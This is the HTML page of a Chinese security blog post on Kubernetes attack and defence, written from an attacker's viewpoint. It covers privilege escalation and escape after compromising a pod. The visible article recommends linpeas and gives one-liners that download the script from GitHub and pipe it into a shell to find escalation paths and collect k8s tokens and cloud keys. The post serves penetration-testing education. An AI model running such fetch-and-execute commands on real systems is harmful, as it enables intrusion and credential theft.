<!DOCTYPE html>
<html lang="en">
    <!-- title -->


    

<!-- keywords -->



<head>
    <meta name="referrer" content="no-referrer">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="azraelxuemo">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="azraelxuemo">
    
        <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="">
    <meta name="description" content="前言以前一有RCE的漏洞可能大家都会精神高度紧绷，但由于容器技术的成熟，很多时候可能RCE的并不是一个主机，而只是一个单独的业务pod。特别是像函数计算，流水线等等场景，你可以直接获得容器的权限，这也导致我们的安全边界有所划分。在我看来，我们可以完全把所有的业务容器当作外部攻击者可以随意控制，把安全边界划分到业务容器和我们企业内部这个边界这里。所以做好容器层面以及容器编排就十分重要。这篇文章主要是">
<meta property="og:type" content="article">
<meta property="og:title" content="k8s攻防">
<meta property="og:url" content="https://azraelxuemo.github.io/2023/11/14/k8s/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="前言以前一有RCE的漏洞可能大家都会精神高度紧绷，但由于容器技术的成熟，很多时候可能RCE的并不是一个主机，而只是一个单独的业务pod。特别是像函数计算，流水线等等场景，你可以直接获得容器的权限，这也导致我们的安全边界有所划分。在我看来，我们可以完全把所有的业务容器当作外部攻击者可以随意控制，把安全边界划分到业务容器和我们企业内部这个边界这里。所以做好容器层面以及容器编排就十分重要。这篇文章主要是">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032311958-dedbd10c-8ca0-4637-afa7-129a048b2f80.png#averageHue=%2321201c&clientId=ud34a835a-3864-4&from=paste&id=u1f12dcfb&originHeight=196&originWidth=904&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u89f1930c-ba95-4cff-a764-2ea2b08ba20&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701173936791-a3abba12-0b03-43a2-b539-e119527a2e3b.png#averageHue=%232a2523&clientId=ud9aab05d-6b0a-4&from=drop&id=u2a7e38a2&originHeight=526&originWidth=2548&originalType=binary&ratio=2&rotation=0&showTitle=false&size=971598&status=done&style=none&taskId=u7b9ac1eb-1cb3-44bb-9532-21897885b46&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032312002-02cdfb44-0cf7-42b7-b935-22361f7f8221.png#averageHue=%23252422&clientId=ud34a835a-3864-4&from=paste&id=ufa4fd988&originHeight=221&originWidth=1335&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u19f11ebb-04ea-4844-834a-bd7dfd0e2dd&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032311959-7eeb0984-d0a4-4333-a180-6c38bdcb8a5f.png#averageHue=%23eedfc2&clientId=ud34a835a-3864-4&from=paste&id=u74f6d08b&originHeight=321&originWidth=2970&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u54243b15-28d9-4e46-9f0b-c21e8c7d1ae&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032311968-37cb1474-2130-46a2-9c04-40a26599c748.png#averageHue=%23272321&clientId=ud34a835a-3864-4&from=paste&id=uad6272a7&originHeight=170&originWidth=2768&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=uafa78859-7c4f-4a17-822e-54c83bd9c82&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032312522-784edcc9-f934-4330-8843-06a7315affd3.png#averageHue=%23e8e8ed&clientId=ud34a835a-3864-4&from=paste&id=u89205c26&originHeight=1034&originWidth=1500&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u867c148e-38c7-436a-8c2f-120e60bcf2c&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032312537-a80895e3-69ba-43a5-ae3d-1feab3f3ab10.png#averageHue=%231f1e1d&clientId=ud34a835a-3864-4&from=paste&id=u571478a7&originHeight=629&originWidth=1973&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=ub0731869-abc4-4fbb-a4d8-966565fe182&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032312630-303ae70c-4483-477b-9ecc-86161113279d.png#averageHue=%231c1c1c&clientId=ud34a835a-3864-4&from=paste&id=u61afef34&originHeight=626&originWidth=1031&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u027ae96f-f3f5-4edf-a512-0adc206f252&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032312584-ea74c7d8-720b-4e10-921a-34abfd211082.png#averageHue=%2321201f&clientId=ud34a835a-3864-4&from=paste&id=ub57addff&originHeight=623&originWidth=779&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u45a70f67-45b3-47b5-9746-f384810a9ee&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032312627-96c09b13-10fd-42c4-896c-f63c2eda73af.png#averageHue=%232a2826&clientId=ud34a835a-3864-4&from=paste&id=u408ae4a4&originHeight=246&originWidth=1987&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u261fb7b0-bd35-42e6-ab40-da29c5aebc1&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313199-ff02cac2-2239-40a5-af38-d345c834d673.png#averageHue=%23d4ad73&clientId=ud34a835a-3864-4&from=paste&id=u34f4bc8f&originHeight=1932&originWidth=4062&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u2661ec20-00e8-4f25-9ee7-c0a68fe238b&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313175-5569d599-bade-4422-8ece-085974413fd6.png#averageHue=%231f1f1e&clientId=ud34a835a-3864-4&from=paste&id=u5f4026e4&originHeight=797&originWidth=917&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=uac59b7b0-58c9-4585-a535-9ac9695d8b3&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313226-6f792d2e-d1ea-4295-9b97-0ff2065fd8d8.png#averageHue=%23e6d088&clientId=ud34a835a-3864-4&from=paste&id=ufd487231&originHeight=700&originWidth=1812&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u13f9f848-aa7b-48f2-9c33-db0ede6747d&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313225-9b68a239-7f00-4052-b92e-ccace29a0ad5.png#averageHue=%231d1c1c&clientId=ud34a835a-3864-4&from=paste&id=u17e57654&originHeight=531&originWidth=748&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u0031ba93-1c78-48bc-adf7-6551275ffa1&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313215-53f04941-5091-4e5f-bb81-18eb4f61962a.png#averageHue=%23e8e8ed&clientId=ud34a835a-3864-4&from=paste&id=u45e69f8b&originHeight=1789&originWidth=2362&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u17dfaff6-26e5-4662-9c93-452f8db99da&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313665-b1045b31-107f-4a54-ac60-7177f3bf918f.png#averageHue=%231d1c1c&clientId=ud34a835a-3864-4&from=paste&id=ua4606656&originHeight=1129&originWidth=2016&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u6665feb2-ca8e-4bb3-a456-981ec302afe&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313724-fb8b6d58-41d5-499a-96f0-ee383a14231b.png#averageHue=%23201f1e&clientId=ud34a835a-3864-4&from=paste&id=ua2a375ba&originHeight=621&originWidth=3088&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u14c67764-f228-470f-ae4c-915efa24736&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701176488832-347556eb-e397-42d1-83ad-2ea67ac5cd87.png#averageHue=%23f7f7f7&clientId=ubcbefb06-20fd-4&from=drop&id=u53a61372&originHeight=1256&originWidth=1504&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1166100&status=done&style=none&taskId=u949ac36c-c04d-4b5a-b28d-9b321f186ac&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701176522448-a5556885-fbde-441f-9763-93e6c74c9ce6.png#averageHue=%23f9f9f9&clientId=ubcbefb06-20fd-4&from=drop&id=u7f786c53&originHeight=1350&originWidth=870&originalType=binary&ratio=2&rotation=0&showTitle=false&size=706479&status=done&style=none&taskId=udcb624b0-2e6f-404b-8ca6-2b453ede374&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701223118384-1a88b938-c822-4b8a-8858-fde0869d5d84.png#averageHue=%23fbfbfb&clientId=u847a9022-aef9-4&from=drop&id=u4b1f03f7&originHeight=1412&originWidth=1822&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1421531&status=done&style=none&taskId=uf61192b2-adf0-4acc-84cd-ba320fb286a&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701177195497-13af6434-324f-4df4-ba9d-f94299cdd969.png#averageHue=%23050504&clientId=ubcbefb06-20fd-4&from=drop&id=uee84d942&originHeight=866&originWidth=1682&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1884131&status=done&style=none&taskId=u2ee7e4c7-9ccb-4920-8325-fd25b8597b4&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032314060-9da11333-9159-4f77-a256-cfe5016e5880.png#averageHue=%231e1d1c&clientId=ud34a835a-3864-4&from=paste&id=u567eb641&originHeight=1438&originWidth=1938&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=ubfd6f96b-3030-4a7f-a69f-f34f56d4115&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032313950-7f92207f-96c8-4dcf-9d2c-68cbd947907a.png#averageHue=%232d2b27&clientId=ud34a835a-3864-4&from=paste&id=ud9dbcc12&originHeight=135&originWidth=2199&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=uf0e7ae25-f72c-435f-a0df-f01774c43fe&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/jpeg/29417415/1700032314038-fbb58191-302f-4291-adb9-aaa3bc651c91.jpeg#averageHue=%23d6d8d0&clientId=ud34a835a-3864-4&from=paste&id=ua22a67f7&originHeight=531&originWidth=848&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u2fc45755-c9a1-4122-a05d-641830467de&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032314376-4674db36-7803-400a-89a2-a37780e87daf.png#averageHue=%232b2a28&clientId=ud34a835a-3864-4&from=paste&id=uc8230a8b&originHeight=466&originWidth=2672&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u555fdc25-6458-4df8-ac13-7b2cc1d7213&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032314470-34cf3cce-02d3-4d51-b0b9-d1c76465d86f.png#averageHue=%2322201f&clientId=ud34a835a-3864-4&from=paste&id=u93d0fb18&originHeight=413&originWidth=2629&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u311088e5-6b68-40c2-a0ac-e6e1948c6a9&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032314659-279334d4-dd6a-458f-a9c2-bb5aae7b7c1e.png#averageHue=%231f1d1d&clientId=ud34a835a-3864-4&from=paste&id=u8751e5ab&originHeight=1169&originWidth=1646&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u3f1b7cb6-fc41-4e00-b58d-16ee3ad3c19&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032314645-e6655000-c303-42e5-9afe-ad5a0c9a9af2.png#averageHue=%231f1d1d&clientId=ud34a835a-3864-4&from=paste&id=u44c6ea7e&originHeight=1163&originWidth=1811&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=ue45ca825-fe35-4559-b349-9870183a94c&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032314963-b4770267-7444-4579-b33d-8029bdc312b3.png#averageHue=%231d1c1c&clientId=ud34a835a-3864-4&from=paste&id=u3aa6d2b8&originHeight=1486&originWidth=2427&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u802e67d8-b55c-43f1-94b4-011c67d2ff2&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032315078-18320175-13da-4d5f-b62e-e27fd28a5ddc.png#averageHue=%231e1d1d&clientId=ud34a835a-3864-4&from=paste&id=u007f0f2e&originHeight=1327&originWidth=2628&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=uc51c96f1-c170-4cc2-a6c5-6f31bb2258d&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701174321541-839a5c93-2fa2-47c0-8cab-6767463ca523.png#averageHue=%23040404&clientId=ubcbefb06-20fd-4&from=drop&id=u8dba14b1&originHeight=738&originWidth=2034&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1520757&status=done&style=none&taskId=uf8268da2-14d6-49e0-81e5-b77afc2158e&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701175681467-de667ec1-2341-4398-a359-3f1b26b119cd.png#averageHue=%23050504&clientId=ubcbefb06-20fd-4&from=drop&id=ue672e054&originHeight=598&originWidth=2274&originalType=binary&ratio=2&rotation=0&showTitle=false&size=1647089&status=done&style=none&taskId=u0bf13743-97fc-4087-bbab-7fe1e065cd5&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701175719407-ebda6e79-f57e-445f-884a-8776a8dd8643.png#averageHue=%23050504&clientId=ubcbefb06-20fd-4&from=drop&id=u31edd57a&originHeight=650&originWidth=2878&originalType=binary&ratio=2&rotation=0&showTitle=false&size=2047379&status=done&style=none&taskId=ubf1fd849-adb7-46a4-9958-be800899ec0&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701226024936-226c8284-f478-468d-992c-d0ae948fd940.png#averageHue=%23050504&clientId=u847a9022-aef9-4&from=drop&id=u9b4fa980&originHeight=836&originWidth=3356&originalType=binary&ratio=2&rotation=0&showTitle=false&size=3144197&status=done&style=none&taskId=u22ae63d6-9ef0-45bc-896e-1d934b5428a&title=">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1701225769818-a2802cd7-fb26-4aff-8d10-54cb36de82b4.png#averageHue=%23732d1f&clientId=u847a9022-aef9-4&from=drop&id=u031fde49&originHeight=60&originWidth=504&originalType=binary&ratio=2&rotation=0&showTitle=false&size=49787&status=done&style=none&taskId=u3434d25e-5cd2-4158-8394-dfe5fa75e25&title=">
<meta property="article:published_time" content="2023-11-14T05:51:34.000Z">
<meta property="article:modified_time" content="2023-11-29T14:15:43.827Z">
<meta property="article:author" content="azraelxuemo">
<meta property="article:tag" content="云安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.nlark.com/yuque/0/2023/png/29417415/1700032311958-dedbd10c-8ca0-4637-afa7-129a048b2f80.png#averageHue=%2321201c&clientId=ud34a835a-3864-4&from=paste&id=u1f12dcfb&originHeight=196&originWidth=904&originalType=url&ratio=2&rotation=0&showTitle=false&status=done&style=none&taskId=u89f1930c-ba95-4cff-a764-2ea2b08ba20&title=">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <link rel="icon" href="/assets/favicon.ico">
    
    <title>k8s攻防 · azraelxuemo&#39;s Studio</title>
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
    (function (w) {
        'use strict'
        // rel=preload support test
        if (!w.loadCSS) {
            w.loadCSS = function () {}
        }
        // define on the loadCSS obj
        var rp = (loadCSS.relpreload = {})
        // rel=preload feature support test
        // runs once and returns a function for compat purposes
        rp.support = (function () {
            var ret
            try {
                ret = w.document.createElement('link').relList.supports('preload')
            } catch (e) {
                ret = false
            }
            return function () {
                return ret
            }
        })()

        // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
        // then change that media back to its intended value on load
        rp.bindMediaToggle = function (link) {
            // remember existing media attr for ultimate state, or default to 'all'
            var finalMedia = link.media || 'all'

            function enableStylesheet() {
                link.media = finalMedia
            }

            // bind load handlers to enable media
            if (link.addEventListener) {
                link.addEventListener('load', enableStylesheet)
            } else if (link.attachEvent) {
                link.attachEvent('onload', enableStylesheet)
            }

            // Set rel and non-applicable media type to start an async request
            // note: timeout allows this to happen async to let rendering continue in IE
            setTimeout(function () {
                link.rel = 'stylesheet'
                link.media = 'only x'
            })
            // also enable media after 3 seconds,
            // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
            setTimeout(enableStylesheet, 3000)
        }

        // loop through link elements in DOM
        rp.poly = function () {
            // double check this to prevent external calls from running
            if (rp.support()) {
                return
            }
            var links = w.document.getElementsByTagName('link')
            for (var i = 0; i < links.length; i++) {
                var link = links[i]
                // qualify links to those with rel=preload and as=style attrs
                if (
                    link.rel === 'preload' &&
                    link.getAttribute('as') === 'style' &&
                    !link.getAttribute('data-loadcss')
                ) {
                    // prevent rerunning on link
                    link.setAttribute('data-loadcss', true)
                    // bind listeners to toggle media back
                    rp.bindMediaToggle(link)
                }
            }
        }

        // if unsupported, run the polyfill
        if (!rp.support()) {
            // run once at least
            rp.poly()

            // rerun poly on an interval until onload
            var run = w.setInterval(rp.poly, 500)
            if (w.addEventListener) {
                w.addEventListener('load', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            } else if (w.attachEvent) {
                w.attachEvent('onload', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            }
        }

        // commonjs
        if (typeof exports !== 'undefined') {
            exports.loadCSS = loadCSS
        } else {
            w.loadCSS = loadCSS
        }
    })(typeof global !== 'undefined' ? global : this)
</script>

    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }
</style>

    <link rel="preload" href="/css/style.css?v=20211217" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="/css/dark.css?v=20211217" as="style">
    <link rel="stylesheet" href="/css/dark.css">
    <link rel="stylesheet" href="/css/mobile.css?v=20211217" media="(max-width: 960px)">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js?v=20211217" as="script">
    <link rel="preload" href="/scripts/dark.js?v=20211217" as="script">
    <link rel="preload" href="/font/Oswald-Regular.ttf" as="font" crossorigin>
    <link rel="preload" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" as="font" crossorigin>
    <!-- algolia -->
    
    <!-- 百度统计  -->
    
    <!-- Google tag (gtag.js) -->
    

<meta name="generator" content="Hexo 7.0.0"></head>

    <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ == undefined) {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js" />')
        }
    </script>
    
        <body class="post-body">
    
        <!-- header -->
        <header class="header header-mobile">
    <!-- top read progress line -->
    <div class="header-element">
        <div class="read-progress"></div>
    </div>
    <!-- sidebar menu button -->
    <div class="header-element">
        
            <div class="header-sidebar-menu">
        
            
                <div style="padding-left: 1px;">&#xe775;</div>
            
        </div>
    </div>
    <!-- header actions -->
    <div class="header-actions">
        <!-- theme mode switch button -->
        <span class="header-theme-btn header-element">
            <i class="fas fa-adjust"></i>
        </span>
        <!-- back to home page text -->
        <span class="home-link header-element">
            <a href=/>azraelxuemo's Studio.</a>
        </span>
    </div>
    <!-- toggle banner for post layout -->
    
        
            <div class="banner">
        
            <div class="blog-title header-element">
                <a href="/">azraelxuemo&#39;s Studio.</a>
            </div>
            <div class="post-title header-element">
                <a href="#" class="post-name">k8s攻防</a>
            </div>
        </div>
    
</header>

        <!-- fixed footer -->
        <footer class="footer-fixed">
    <!-- back to top button -->
    <div class="footer-fixed-element">
        
            <div class="back-top back-top-hidden">
        
        
            <div>&#xe639;</div>
        
        </div>
    </div>
</footer>

        <!-- wrapper -->
        <div class="wrapper">
            <div class="site-intro" style="







    height:50vh;

">
    
    <!-- 主页  -->
    
        
    <!-- 404页  -->
    
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
                k8s攻防
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
                
            <!-- 404 -->
            
        </p>
        <!-- 文章页 meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
    
        <a class="post-tag" href="javascript:void(0);" data-tags="云安全">云安全</a>
    
</div>

                
                <!-- 文章字数统计 -->
                
                <div class="post-intro-meta">
                    <!-- 撰写日期 -->
                    <span class="iconfont-archer post-intro-calander">&#xe676;</span>
                    <span class="post-intro-time">2023/11/14</span>
                    <!-- busuanzi -->
                    
                        <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                            <span class="iconfont-archer post-intro-busuanzi">&#xe602;</span>
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    
                    <!-- 文章分享 -->
                    <span class="share-wrapper">
                        <span class="iconfont-archer share-icon">&#xe71d;</span>
                        <span class="share-text">Share</span>
                        <ul class="share-list">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>

            <script>
  // get user agent
  function getBrowserVersions() {
    var u = window.navigator.userAgent
    return {
      userAgent: u,
      trident: u.indexOf('Trident') > -1, //IE内核
      presto: u.indexOf('Presto') > -1, //opera内核
      webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
      gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
      mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
      ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
      android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
      iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
      iPad: u.indexOf('iPad') > -1, //是否为iPad
      webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
      weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
      uc: u.indexOf('UCBrowser') > -1, //是否为android下的UC浏览器
    }
  }
  var browser = {
    versions: getBrowserVersions(),
  }
  console.log('userAgent: ' + browser.versions.userAgent)

  // callback
  function fontLoaded() {
    console.log('font loaded')
    if (document.getElementsByClassName('site-intro-meta')) {
      document
        .getElementsByClassName('intro-title')[0]
        .classList.add('intro-fade-in')
      document
        .getElementsByClassName('intro-subtitle')[0]
        .classList.add('intro-fade-in')
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in')
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb() {
    if (browser.versions.uc) {
      console.log('UCBrowser')
      fontLoaded()
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular'],
        },
        loading: function () {
          // 所有字体开始加载
          // console.log('font loading');
        },
        active: function () {
          // 所有字体已渲染
          fontLoaded()
        },
        inactive: function () {
          // 字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout')
          fontLoaded()
        },
        timeout: 5000, // Set the timeout to two seconds
      })
    }
  }

  function asyncErr() {
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0]
    o.src = u
    if (cb) {
      o.addEventListener(
        'load',
        function (e) {
          cb(null, e)
        },
        false
      )
    }
    if (err) {
      o.addEventListener(
        'error',
        function (e) {
          err(null, e)
        },
        false
      )
    }
    s.parentNode.insertBefore(o, s)
  }

  var asyncLoadWithFallBack = function (arr, success, reject) {
    var currReject = function () {
      reject()
      arr.shift()
      if (arr.length) async(arr[0], success, currReject)
    }

    async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack(
    [
      'https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js',
      'https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js',
      "/lib/webfontloader.min.js",
    ],
    asyncCb,
    asyncErr
  )
</script>

            <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
            <div class="container container-unloaded">
                <main class="main post-page">
    <article class="article-entry">
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a><strong>前言</strong></h1><p>以前一有RCE的漏洞可能大家都会精神高度紧绷，但由于容器技术的成熟，很多时候可能RCE的并不是一个主机，而只是一个单独的业务pod。特别是像函数计算，流水线等等场景，你可以直接获得容器的权限，这也导致我们的安全边界有所划分。在我看来，我们可以完全把所有的业务容器当作外部攻击者可以随意控制，把安全边界划分到业务容器和我们企业内部这个边界这里。所以做好容器层面以及容器编排就十分重要。这篇文章主要是以攻击者的角度来分析当攻击者获取了容器的权限，如何进一步把自己的攻击影响范围扩大。如果您是云安全的爱好者，希望您可以从这篇文章里面有所收获。</p>
<h1 id="攻击面分析"><a href="#攻击面分析" class="headerlink" title="攻击面分析"></a><strong>攻击面分析</strong></h1><p>一般当我获取到了容器权限，我会以纵向和横向两个方向来切入。纵向主要是以提权逃逸为主，有时候我们反弹shell了可能权限不一定是root，这个时候就需要提权，当然更多时候是以root为主，这个时候就可以考虑逃逸到宿主机上。那么横向攻击就是横向移动，由于大多数业务场景没有做好网络隔离，那么可能我们的pod可以访问到其他的业务服务，同时在k8s的环境下，往往我们可以访问到api server等等服务，这个时候就会带来新的安全风险。</p>
<h2 id="纵向攻击"><a href="#纵向攻击" class="headerlink" title="纵向攻击"></a><strong>纵向攻击</strong></h2><h3 id="提权"><a href="#提权" class="headerlink" title="提权"></a><strong>提权</strong></h3><p>在实际场景中，可能我们rce之后到容器里获得的不是root权限，那么我们就需要先在容器里进行提权，获取容器的root权限，这里简单分享一下思路和工具。</p>
<h4 id="linpeas"><a href="#linpeas" class="headerlink" title="linpeas"></a><strong>linpeas</strong></h4><p>这个工具专门为提权而生，他可以检查一些常见的比如说suid，pkexec等，还会收集比如说k8s token,ak&#x2F;sk等敏感信息</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh</span><br><span class="line">wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash ./linpeas.sh</span><br></pre></td></tr></table></figure>
